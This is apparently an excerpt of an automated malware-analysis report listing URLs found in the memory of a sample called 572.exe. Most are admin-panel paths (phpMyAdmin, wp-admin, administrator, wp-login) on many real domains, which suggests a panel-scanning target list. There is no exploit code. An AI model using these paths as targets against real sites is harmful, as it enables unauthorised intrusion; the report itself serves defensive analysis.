                Source: 572.exe, 00000009.00000003.4579113128.0000000005642000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://auth.cambridgelms.org/pma/
                Source: 572.exe, 00000009.00000003.4307717822.0000000005997000.00000004.00000020.00020000.00000000.sdmp, 572.exe, 00000009.00000003.4390567048.0000000039205000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://auth.cambridgelms.org/wp-admin/
                Source: 572.exe, 00000009.00000003.4390567048.0000000039205000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://auth.cambridgelms.org/wp-admin/hp
                Source: 572.exe, 00000009.00000003.4579113128.0000000005634000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://auth.riotgames.com/PhpMyAdmin/
                Source: 572.exe, 00000009.00000003.4579113128.0000000005634000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://auth.riotgames.com/PhpMyAdmin/I
                Source: 572.exe, 00000009.00000003.4390567048.0000000039205000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://auth.riotgames.com/admin.php
                Source: 572.exe, 00000009.00000003.4390567048.0000000039205000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://auth.riotgames.com/admin.phphp
                Source: 572.exe, 00000009.00000003.4307098588.00000000061EE000.00000004.00000020.00020000.00000000.sdmp, 572.exe, 00000009.00000003.4464339832.000000004D81C000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://auth.riotgames.com/administrator/
                Source: 572.exe, 00000009.00000003.4533691780.00000000056FD000.00000004.00000020.00020000.00000000.sdmp, 572.exe, 00000009.00000003.4579113128.0000000005634000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://auth.riotgames.com/phpMyAdmin/
                Source: 572.exe, 00000009.00000003.4390567048.0000000039205000.00000004.00000020.00020000.00000000.sdmp, 572.exe, 00000009.00000003.4579113128.0000000005634000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://auth.riotgames.com/phpmyadmin/
                Source: 572.exe, 00000009.00000003.4579113128.0000000005634000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://auth.riotgames.com/phpmyadmin/R
                Source: 572.exe, 00000009.00000003.4521192060.000000004E617000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://authenticate.riotgames.com/
                Source: 572.exe, 00000009.00000003.4521192060.000000004E617000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://authenticate.riotgames.com/5
                Source: 572.exe, 00000009.00000003.4579113128.0000000005658000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://authenticate.riotgames.com/PhpMyAdmin/
                Source: 572.exe, 00000009.00000003.4579113128.0000000005658000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://authenticate.riotgames.com/PhpMyAdmin/SF
                Source: 572.exe, 00000009.00000003.4299205287.00000000405EA000.00000004.00000020.00020000.00000000.sdmp, 572.exe, 00000009.00000003.4521192060.000000004E5B4000.00000004.00000020.00020000.00000000.sdmp, 572.exe, 00000009.00000003.4306089773.000000004E6E6000.00000004.00000020.00020000.00000000.sdmp, 572.exe, 00000009.00000003.4309603552.000000004E5B2000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://authenticate.riotgames.com/admin
                Source: 572.exe, 00000009.00000003.4309603552.000000004E5DB000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://authenticate.riotgames.com/admin.php
                Source: 572.exe, 00000009.00000003.4404017123.000000004E792000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://authenticate.riotgames.com/admin.phpF
                Source: 572.exe, 00000009.00000003.4306089773.000000004E6E6000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://authenticate.riotgames.com/adminexchange
                Source: 572.exe, 00000009.00000003.4464339832.000000004D81C000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://authenticate.riotgames.com/administrator/
                Source: 572.exe, 00000009.00000003.4347804108.000000004E4B5000.00000004.00000020.00020000.00000000.sdmp, 572.exe, 00000009.00000003.4464339832.000000004D81C000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://authenticate.riotgames.com/administrator/index.php
                Source: 572.exe, 00000009.00000003.4347804108.000000004E4B5000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://authenticate.riotgames.com/administrator/index.phppX
                Source: 572.exe, 00000009.00000003.4521192060.000000004E5B4000.00000004.00000020.00020000.00000000.sdmp, 572.exe, 00000009.00000003.4309603552.000000004E5B2000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://authenticate.riotgames.com/adminphp/
                Source: 572.exe, 00000009.00000003.4521192060.000000004E5B4000.00000004.00000020.00020000.00000000.sdmp, 572.exe, 00000009.00000003.4309603552.000000004E5B2000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://authenticate.riotgames.com/adminxz
                Source: 572.exe, 00000009.00000003.4579113128.0000000005658000.00000004.00000020.00020000.00000000.sdmp, 572.exe, 00000009.00000003.4304254421.0000000033369000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://authenticate.riotgames.com/phpMyAdmin/
                Source: 572.exe, 00000009.00000003.4579113128.0000000005658000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://authenticate.riotgames.com/phpmyadmin/
                Source: 572.exe, 00000009.00000003.4579113128.0000000005658000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://authenticate.riotgames.com/pma/
                Source: 572.exe, 00000009.00000003.4579113128.0000000005658000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://authenticate.riotgames.com/pma/Admin/
                Source: 572.exe, 00000009.00000003.4521192060.000000004E617000.00000004.00000020.00020000.00000000.sdmp, 572.exe, 00000009.00000003.4286826015.000000007FDE4000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://authenticate.riotgames.com/wp-admin/
                Source: 572.exe, 00000009.00000003.4286826015.000000007FDE4000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://authenticate.riotgames.com/wp-admin//z
                Source: 572.exe, 00000009.00000003.4521192060.000000004E617000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://authenticate.riotgames.com/wp-admin/hp
                Source: 572.exe, 00000009.00000003.4286826015.000000007FDE4000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://authenticate.riotgames.com/wp-admin/o
                Source: 572.exe, 00000009.00000003.4521192060.000000004E617000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://authenticate.riotgames.com/wp-login.php
                Source: 572.exe, 00000009.00000003.4521192060.000000004E617000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://authenticate.riotgames.com/wp-login.php#
                Source: 572.exe, 00000009.00000003.4295954228.0000000047B0B000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://boletia.com
                Source: 572.exe, 00000009.00000003.4513550067.000000004E0C2000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://brasilliker.net/
                Source: 572.exe, 00000009.00000003.4306089773.000000004E70A000.00000004.00000020.00020000.00000000.sdmp, 572.exe, 00000009.00000003.4347804108.000000004E509000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://brasilliker.net/administrator/
                Source: 572.exe, 00000009.00000003.4347804108.000000004E4B5000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://brasilliker.net/administrator/index.php
                Source: 572.exe, 00000009.00000003.4347804108.000000004E4B5000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://brasilliker.net/administrator/index.php.
                Source: 572.exe, 00000009.00000003.4347804108.000000004E461000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://brasilliker.net/phpMyAdmin/
                Source: 572.exe, 00000009.00000003.4309603552.000000004E5DB000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://brasilliker.net/phpmyadmin/
                Source: 572.exe, 00000009.00000003.4309603552.000000004E5DB000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://brasilliker.net/phpmyadmin/-L
                Source: 572.exe, 00000009.00000003.4286826015.000000007FDE4000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://brasilliker.net/wp-admin/
                Source: 572.exe, 00000009.00000003.4286826015.000000007FDE4000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://brasilliker.net/wp-admin/admin/.com
                Source: 572.exe, 00000009.00000003.4070644791.0000000064023000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://browsehappy.com/?locale=es
                Source: explorer.exe, 00000002.00000000.2124664252.000000000978C000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000000.2124664252.000000000973C000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://cacerts.digicert.com/DigiCertGlobalRootG2.crt0
                Source: 572.exe, 00000009.00000003.4521192060.000000004E677000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://cacerts.rapidssl.com/RapidSSLTLSRSACAG1.crt
                Source: 572.exe, 00000009.00000003.4327514305.000000004D9CF000.00000004.00000020.00020000.00000000.sdmp, 572.exe, 00000009.00000003.4298111023.00000000406D1000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://cacerts.rapidssl.com/RapidSSLTLSRSACAG1.crt0
                Source: 572.exe, 00000009.00000003.4579113128.0000000005634000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://casinocontroller.com/PhpMyAdmin/
                Source: 572.exe, 00000009.00000003.4579113128.0000000005634000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://casinocontroller.com/PhpMyAdmin/s
                Source: 572.exe, 00000009.00000003.4464339832.000000004D81C000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://casinocontroller.com/administrator/
                Source: 572.exe, 00000009.00000003.4464339832.000000004D81C000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://casinocontroller.com/administrator/5
                Source: 572.exe, 00000009.00000003.4304769446.0000000040257000.00000004.00000020.00020000.00000000.sdmp, 572.exe, 00000009.00000003.4521192060.000000004E5B4000.00000004.00000020.00020000.00000000.sdmp, 572.exe, 00000009.00000003.4309603552.000000004E5B2000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://casinocontroller.com/administrator/index.php
                Source: 572.exe, 00000009.00000003.4304769446.0000000040257000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://casinocontroller.com/administrator/index.phpID
                Source: 572.exe, 00000009.00000003.4382010526.000000004E6A3000.00000004.00000020.00020000.00000000.sdmp, 572.exe, 00000009.00000003.4304769446.0000000040257000.00000004.00000020.00020000.00000000.sdmp, 572.exe, 00000009.00000003.4521192060.000000004E5B4000.00000004.00000020.00020000.00000000.sdmp, 572.exe, 00000009.00000003.4309603552.000000004E5B2000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://casinocontroller.com/phpMyAdmin/
                Source: 572.exe, 00000009.00000003.4304769446.0000000040257000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://casinocontroller.com/phpMyAdmin/9-1
                Source: 572.exe, 00000009.00000003.4521192060.000000004E5B4000.00000004.00000020.00020000.00000000.sdmp, 572.exe, 00000009.00000003.4309603552.000000004E5B2000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://casinocontroller.com/phpMyAdmin/in/
                Source: 572.exe, 00000009.00000003.4579113128.0000000005634000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://casinocontroller.com/pma/
                Source: 572.exe, 00000009.00000003.4304769446.0000000040257000.00000004.00000020.00020000.00000000.sdmp, 572.exe, 00000009.00000003.4390567048.0000000039205000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://cdp.rapidssl.com/RapidSSLTLSRSACAG1.crl
                Source: 572.exe, 00000009.00000003.4327514305.000000004D9CF000.00000004.00000020.00020000.00000000.sdmp, 572.exe, 00000009.00000003.4298111023.00000000406D1000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://cdp.rapidssl.com/RapidSSLTLSRSACAG1.crl0
                Source: 572.exe, 00000009.00000003.4304769446.0000000040257000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://cdp.rapidssl.com/RapidSSLTLSRSACAG1.crlept:
                Source: 572.exe, 00000009.00000003.4579113128.0000000005628000.00000004.00000020.00020000.00000000.sdmp, 572.exe, 00000009.00000003.4464339832.000000004D81C000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://chainmine.io/administrator/
                Source: 572.exe, 00000009.00000003.4579113128.0000000005628000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://chainmine.io/administrator/index.php
                Source: 572.exe, 00000009.00000003.4569330969.000000000492E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://cjdropshipping.com/
                Source: 572.exe, 00000009.00000003.4579113128.0000000005634000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://cjdropshipping.com/PhpMyAdmin/
                Source: 572.exe, 00000009.00000003.4464339832.000000004D81C000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://cjdropshipping.com/administrator/
                Source: 572.exe, 00000009.00000003.4298111023.000000004069A000.00000004.00000020.00020000.00000000.sdmp, 572.exe, 00000009.00000003.4521192060.000000004E5B4000.00000004.00000020.00020000.00000000.sdmp, 572.exe, 00000009.00000003.4309603552.000000004E5B2000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://cjdropshipping.com/administrator/index.php
                Source: 572.exe, 00000009.00000003.4298111023.000000004069A000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://cjdropshipping.com/administrator/index.php3535/
                Source: 572.exe, 00000009.00000003.4521192060.000000004E5B4000.00000004.00000020.00020000.00000000.sdmp, 572.exe, 00000009.00000003.4309603552.000000004E5B2000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://cjdropshipping.com/administrator/index.phpom.br110
                Source: 572.exe, 00000009.00000003.4579113128.0000000005634000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://cjdropshipping.com/phpMyAdmin/
                Source: 572.exe, 00000009.00000003.4579113128.0000000005634000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://cjdropshipping.com/phpmyadmin/
                Source: 572.exe, 00000009.00000003.4579113128.0000000005642000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://cloud.simplify3d.com/PhpMyAdmin/
                Source: 572.exe, 00000009.00000003.4464339832.000000004D81C000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://cloud.simplify3d.com/administrator/
                Source: 572.exe, 00000009.00000003.4072180672.0000000047B2E000.00000004.00000020.00020000.00000000.sdmp, 572.exe, 00000009.00000003.4521192060.000000004E5B4000.00000004.00000020.00020000.00000000.sdmp, 572.exe, 00000009.00000003.4306089773.000000004E6E6000.00000004.00000020.00020000.00000000.sdmp, 572.exe, 00000009.00000003.4309603552.000000004E5B2000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://cloud.simplify3d.com/phpmyadmin/
                Source: 572.exe, 00000009.00000003.4521192060.000000004E5B4000.00000004.00000020.00020000.00000000.sdmp, 572.exe, 00000009.00000003.4309603552.000000004E5B2000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://cloud.simplify3d.com/phpmyadmin/e
                Source: 572.exe, 00000009.00000003.4579113128.0000000005642000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://cloud.simplify3d.com/pma/
                Source: 572.exe, 00000009.00000003.4579113128.0000000005628000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://connect.appen.com/PhpMyAdmin/
                Source: 572.exe, 00000009.00000003.4464339832.000000004D81C000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://connect.appen.com/administrator/
                Source: 572.exe, 00000009.00000003.4347804108.000000004E4B5000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://connect.appen.com/administrator/index.php
                Source: 572.exe, 00000009.00000003.4579113128.0000000005628000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://connect.appen.com/phpMyAdmin/
                Source: 572.exe, 00000009.00000003.4196885790.0000000047AF1000.00000004.00000020.00020000.00000000.sdmp, 572.exe, 00000009.00000003.4315918557.000000004E1A0000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://innovationdevelopment.eu/pl/wp-admin/
                Source: 572.exe, 00000009.00000003.4579113128.0000000005642000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://innovationdevelopment.eu/pma/
                Source: 572.exe, 00000009.00000003.4018148306.0000000064082000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://innovationdevelopment.eu/ro/admin.php
                Source: 572.exe, 00000009.00000003.4307098588.000000000622F000.00000004.00000020.00020000.00000000.sdmp, 572.exe, 00000009.00000003.4018148306.0000000064082000.00000004.00000020.00020000.00000000.sdmp, 572.exe, 00000009.00000003.4184636529.0000000047AC3000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://innovationdevelopment.eu/ro/phpmyadmin/
                Source: 572.exe, 00000009.00000003.4196885790.0000000047AF1000.00000004.00000020.00020000.00000000.sdmp, 572.exe, 00000009.00000003.4315918557.000000004E1A0000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://innovationdevelopment.eu/ro/wp-admin/
                Source: 572.exe, 00000009.00000003.4018148306.0000000064082000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://innovationdevelopment.eu/sk/admin.php
                Source: 572.exe, 00000009.00000003.4307098588.000000000622F000.00000004.00000020.00020000.00000000.sdmp, 572.exe, 00000009.00000003.4018148306.0000000064082000.00000004.00000020.00020000.00000000.sdmp, 572.exe, 00000009.00000003.4184636529.0000000047AC3000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://innovationdevelopment.eu/sk/phpmyadmin/
                Source: 572.exe, 00000009.00000003.4196885790.0000000047AF1000.00000004.00000020.00020000.00000000.sdmp, 572.exe, 00000009.00000003.4315918557.000000004E1A0000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://innovationdevelopment.eu/sk/wp-admin/
                Source: 572.exe, 00000009.00000003.4308254495.0000000031630000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://innovationdevelopment.eu/tlook.com=t
                Source: 572.exe, 00000009.00000003.4404017123.000000004E792000.00000004.00000020.00020000.00000000.sdmp, 572.exe, 00000009.00000003.4308254495.0000000031630000.00000004.00000020.00020000.00000000.sdmp, 572.exe, 00000009.00000003.4286826015.000000007FDE4000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://innovationdevelopment.eu/wp-admin/
                Source: 572.exe, 00000009.00000003.4286826015.000000007FDE4000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://innovationdevelopment.eu/wp-admin/N
                Source: 572.exe, 00000009.00000003.4286826015.000000007FDE4000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://innovationdevelopment.eu/wp-admin/NS
                Source: 572.exe, 00000009.00000003.4404017123.000000004E792000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://innovationdevelopment.eu/wp-admin/ampowered.com
                Source: 572.exe, 00000009.00000003.4308254495.0000000031630000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://innovationdevelopment.eu/wp-admin/hp
                Source: 572.exe, 00000009.00000003.4308254495.0000000031630000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://innovationdevelopment.eu/wp-login.php
                Source: 572.exe, 00000009.00000003.4308254495.0000000031630000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://innovationdevelopment.eu/wp-login.php~t
                Source: 572.exe, 00000009.00000003.4579113128.0000000005634000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://instructory.net/PhpMyAdmin/
                Source: 572.exe, 00000009.00000003.4579113128.0000000005634000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://instructory.net/PhpMyAdmin/21#
                Source: 572.exe, 00000009.00000003.4307098588.0000000006245000.00000004.00000020.00020000.00000000.sdmp, 572.exe, 00000009.00000003.4464339832.000000004D81C000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://instructory.net/administrator/
                Source: 572.exe, 00000009.00000003.4579113128.0000000005642000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://instructory.net/phpMyAdmin/
                Source: 572.exe, 00000009.00000003.4579113128.0000000005642000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://instructory.net/phpmyadmin/
                Source: 572.exe, 00000009.00000003.4579113128.0000000005642000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://instructory.net/phpmyadmin/n/
                Source: 572.exe, 00000009.00000003.4579113128.0000000005658000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://kamgarsetu.mp.gov.in/PhpMyAdmin/
                Source: 572.exe, 00000009.00000003.4579113128.0000000005658000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://kamgarsetu.mp.gov.in/phpMyAdmin/
                Source: 572.exe, 00000009.00000003.4579113128.0000000005658000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://kamgarsetu.mp.gov.in/phpMyAdmin/admin/
                Source: 572.exe, 00000009.00000003.4579113128.0000000005658000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://kamgarsetu.mp.gov.in/phpmyadmin/
                Source: 572.exe, 00000009.00000003.4579113128.0000000005658000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://kamgarsetu.mp.gov.in/pma/
                Source: 572.exe, 00000009.00000003.4579113128.0000000005658000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://kamgarsetu.mp.gov.in/pma/Admin/dmin/
                Source: 572.exe, 00000009.00000003.4439315683.000000004E6E6000.00000004.00000020.00020000.00000000.sdmp, 572.exe, 00000009.00000003.4309603552.000000004E5F3000.00000004.00000020.00020000.00000000.sdmp, 572.exe, 00000009.00000003.4306089773.000000004E6E6000.00000004.00000020.00020000.00000000.sdmp, 572.exe, 00000009.00000003.4347804108.000000004E509000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://kwyk.fr/administrator/index.php
                Source: 572.exe, 00000009.00000003.4439315683.000000004E6E6000.00000004.00000020.00020000.00000000.sdmp, 572.exe, 00000009.00000003.4306089773.000000004E6E6000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://kwyk.fr/administrator/index.phpB=
                Source: 572.exe, 00000009.00000003.4309603552.000000004E5F3000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://kwyk.fr/administrator/index.phpphp
                Source: 572.exe, 00000009.00000003.4464339832.000000004D81C000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://login.adf.ly/administrator/
                Source: 572.exe, 00000009.00000003.4464339832.000000004D81C000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://login.adf.ly/administrator/F
                Source: 572.exe, 00000009.00000003.4502455045.00000000058EB000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://login.microsoftonline.com/
                Source: 572.exe, 00000009.00000003.4502455045.00000000058EB000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://login.microsoftonline.com/(
                Source: 572.exe, 00000009.00000003.4502455045.00000000058EB000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://login.microsoftonline.com/administrator/
                Source: 572.exe, 00000009.00000003.4502455045.00000000058EB000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://login.microsoftonline.com/administrator/g
                Source: 572.exe, 00000009.00000003.4502455045.00000000058EB000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://login.microsoftonline.com/administrator/i
                Source: 572.exe, 00000009.00000003.4521192060.000000004E5FF000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://login.microsoftonline.com/phpmyadmin/
                Source: 572.exe, 00000009.00000003.4521192060.000000004E5FF000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://login.microsoftonline.com/phpmyadmin/0
                Source: 572.exe, 00000009.00000003.4521192060.000000004E5FF000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://login.microsoftonline.com/phpmyadmin/q
                Source: 572.exe, 00000009.00000003.4579113128.0000000005642000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://login2.innova.puglia.it/PhpMyAdmin/
                Source: 572.exe, 00000009.00000003.4579113128.0000000005642000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://login2.innova.puglia.it/PhpMyAdmin/Zz
                Source: 572.exe, 00000009.00000003.4307098588.00000000061EE000.00000004.00000020.00020000.00000000.sdmp, 572.exe, 00000009.00000003.4464339832.000000004D81C000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://login2.innova.puglia.it/administrator/
                Source: 572.exe, 00000009.00000003.4579113128.0000000005642000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://login2.innova.puglia.it/phpMyAdmin/
                Source: 572.exe, 00000009.00000003.4579113128.0000000005642000.00000004.00000020.00020000.00000000.sdmp, 572.exe, 00000009.00000003.4306089773.000000004E70A000.00000004.00000020.00020000.00000000.sdmp, 572.exe, 00000009.00000003.4306089773.000000004E6E6000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://login2.innova.puglia.it/phpmyadmin/
                Source: 572.exe, 00000009.00000003.4306089773.000000004E70A000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://login2.innova.puglia.it/phpmyadmin/m
                Source: 572.exe, 00000009.00000003.4306089773.000000004E6E6000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://login2.innova.puglia.it/phpmyadmin/o
                Source: 572.exe, 00000009.00000003.4306089773.000000004E70A000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://login2.innova.puglia.it/phpmyadmin/v
                Source: 572.exe, 00000009.00000003.4579113128.0000000005642000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://login2.innova.puglia.it/pma/
                Source: 572.exe, 00000009.00000003.4579113128.0000000005660000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://lookaside.fbsbx.com/PhpMyAdmin/
                Source: 572.exe, 00000009.00000003.4579113128.0000000005634000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://lookaside.fbsbx.com/administrator/
                Source: 572.exe, 00000009.00000003.4579113128.0000000005634000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://lookaside.fbsbx.com/administrator/W
                Source: 572.exe, 00000009.00000003.4306089773.000000004E6E6000.00000004.00000020.00020000.00000000.sdmp, 572.exe, 00000009.00000003.4054751612.000000004068B000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://lookaside.fbsbx.com/administrator/index.php
                Source: 572.exe, 00000009.00000003.4306089773.000000004E6E6000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://lookaside.fbsbx.com/administrator/index.phpp
                Source: 572.exe, 00000009.00000003.4579113128.0000000005660000.00000004.00000020.00020000.00000000.sdmp, 572.exe, 00000009.00000003.4306089773.000000004E70A000.00000004.00000020.00020000.00000000.sdmp, 572.exe, 00000009.00000003.4262755230.0000000063EF9000.00000004.00000020.00020000.00000000.sdmp, 572.exe, 00000009.00000003.4306089773.000000004E6E6000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://lookaside.fbsbx.com/phpMyAdmin/
                Source: 572.exe, 00000009.00000003.4306089773.000000004E6E6000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://lookaside.fbsbx.com/phpMyAdmin/.com.br993ineduc.cl
                Source: 572.exe, 00000009.00000003.4579113128.0000000005660000.00000004.00000020.00020000.00000000.sdmp, 572.exe, 00000009.00000003.4347804108.000000004E461000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://lookaside.fbsbx.com/phpmyadmin/
                Source: 572.exe, 00000009.00000003.4347804108.000000004E4B5000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://loopex.io/administrator/index.php
                Source: 572.exe, 00000009.00000003.4347804108.000000004E4B5000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://loopex.io/administrator/index.phpdex.php
                Source: 572.exe, 00000009.00000003.4502455045.00000000058EB000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://m.codere.com.co/PhpMyAdmin/
                Source: 572.exe, 00000009.00000003.4502455045.00000000058EB000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://m.codere.com.co/PhpMyAdmin/om22
                Source: 572.exe, 00000009.00000003.4307098588.0000000006245000.00000004.00000020.00020000.00000000.sdmp, 572.exe, 00000009.00000003.4464339832.000000004D81C000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://m.codere.com.co/administrator/
                Source: 572.exe, 00000009.00000003.4307098588.0000000006245000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://m.codere.com.co/administrator/K~
                Source: 572.exe, 00000009.00000003.4502455045.00000000058EB000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://m.codere.com.co/phpMyAdmin/
                Source: 572.exe, 00000009.00000003.4306089773.000000004E70A000.00000004.00000020.00020000.00000000.sdmp, 572.exe, 00000009.00000003.4262755230.0000000063EF9000.00000004.00000020.00020000.00000000.sdmp, 572.exe, 00000009.00000003.4306089773.000000004E6E6000.00000004.00000020.00020000.00000000.sdmp, 572.exe, 00000009.00000003.4502455045.00000000058EB000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://m.codere.com.co/phpmyadmin/
                Source: 572.exe, 00000009.00000003.4306089773.000000004E6E6000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://m.codere.com.co/phpmyadmin/wV/yvpVYgUQE6hwe8qg==s$B
                Source: 572.exe, 00000009.00000003.4502455045.00000000058EB000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://m.codere.com.co/phpmyadmin/x)P
